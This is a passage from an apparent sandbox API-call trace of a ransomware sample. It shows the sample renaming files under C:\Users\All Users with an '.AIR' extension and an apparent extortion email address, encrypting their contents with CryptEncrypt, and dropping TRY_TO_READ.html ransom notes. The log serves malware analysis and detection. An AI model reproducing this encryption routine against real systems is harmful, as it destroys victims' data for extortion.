lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.426] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.426] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.426] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x14c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x14c, lpOverlapped=0x0) returned 1 [0161.426] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-332, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.426] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x14c, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x14c, lpOverlapped=0x0) returned 1 [0161.427] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.427] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.427] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.427] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned 55 [0161.427] GetProcessHeap () returned 0x2e0000 [0161.427] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x319d30 [0161.427] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" [0161.427] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.427] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.430] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.430] GetProcessHeap () returned 0x2e0000 [0161.430] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.430] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=326) returned 1 [0161.430] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x146 [0161.430] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.430] GetProcessHeap () returned 0x2e0000 [0161.430] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.430] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.430] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.432] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.432] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.432] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x146, lpOverlapped=0x0) returned 1 [0161.432] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.432] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x146, lpOverlapped=0x0) returned 1 [0161.432] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.432] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.432] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.433] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned 59 [0161.433] GetProcessHeap () returned 0x2e0000 [0161.433] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xdc) returned 0x3ac428 [0161.433] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" [0161.433] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.433] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.437] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.437] GetProcessHeap () returned 0x2e0000 [0161.437] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0161.437] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=350) returned 1 [0161.437] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x15e [0161.437] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.437] GetProcessHeap () returned 0x2e0000 [0161.437] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.437] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.437] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.438] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.438] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.438] ReadFile (in: hFile=0x4d8, lpBuffer=0x30a498, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x15e, lpOverlapped=0x0) returned 1 [0161.438] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-350, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.439] WriteFile (in: hFile=0x4d8, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x15e, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x15e, lpOverlapped=0x0) returned 1 [0161.439] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.439] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.439] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.439] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned 55 [0161.439] GetProcessHeap () returned 0x2e0000 [0161.439] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd4) returned 0x319d30 [0161.439] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" [0161.439] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.439] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.442] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.EXCEL.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.443] GetProcessHeap () returned 0x2e0000 [0161.443] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.443] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=326) returned 1 [0161.443] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x146 [0161.443] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.443] GetProcessHeap () returned 0x2e0000 [0161.443] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.443] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.443] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.444] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.444] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.444] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x146, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x146, lpOverlapped=0x0) returned 1 [0161.444] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-326, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.444] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x146, lpOverlapped=0x0) returned 1 [0161.444] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.445] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.445] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn", dwFileAttributes=0x80) returned 1 [0161.445] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn") returned 41 [0161.445] GetProcessHeap () returned 0x2e0000 [0161.445] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb8) returned 0x34af58 [0161.445] lstrcpyW (in: lpString1=0x34af58, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn" [0161.445] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.445] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.448] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\Hx.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\hx.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.448] GetProcessHeap () returned 0x2e0000 [0161.448] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x34af58 | out: hHeap=0x2e0000) returned 1 [0161.448] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=390) returned 1 [0161.448] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x186 [0161.448] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.448] GetProcessHeap () returned 0x2e0000 [0161.448] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.448] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.449] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.449] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.449] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.450] ReadFile (in: hFile=0x4d8, lpBuffer=0x319788, nNumberOfBytesToRead=0x186, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesRead=0x2acf9c8*=0x186, lpOverlapped=0x0) returned 1 [0161.450] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-390, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.450] WriteFile (in: hFile=0x4d8, lpBuffer=0x32f868*, nNumberOfBytesToWrite=0x186, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x32f868*, lpNumberOfBytesWritten=0x2acf9c8*=0x186, lpOverlapped=0x0) returned 1 [0161.450] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Mozilla\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e5d8 [0161.450] FindNextFileW (in: hFindFile=0x35e5d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.450] FindNextFileW (in: hFindFile=0x35e5d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="logs", cAlternateFileName="")) returned 1 [0161.450] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Mozilla\\logs\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\mozilla\\logs\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0161.453] FindNextFileW (in: hFindFile=0x35e5d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978f4db0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.453] FindNextFileW (in: hFindFile=0x35e5d8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978f4db0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.453] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Oracle\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e618 [0161.453] FindNextFileW (in: hFindFile=0x35e618, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.453] FindNextFileW (in: hFindFile=0x35e618, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978f4db0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.453] FindNextFileW (in: hFindFile=0x35e618, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978f4db0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.454] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Package Cache\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, 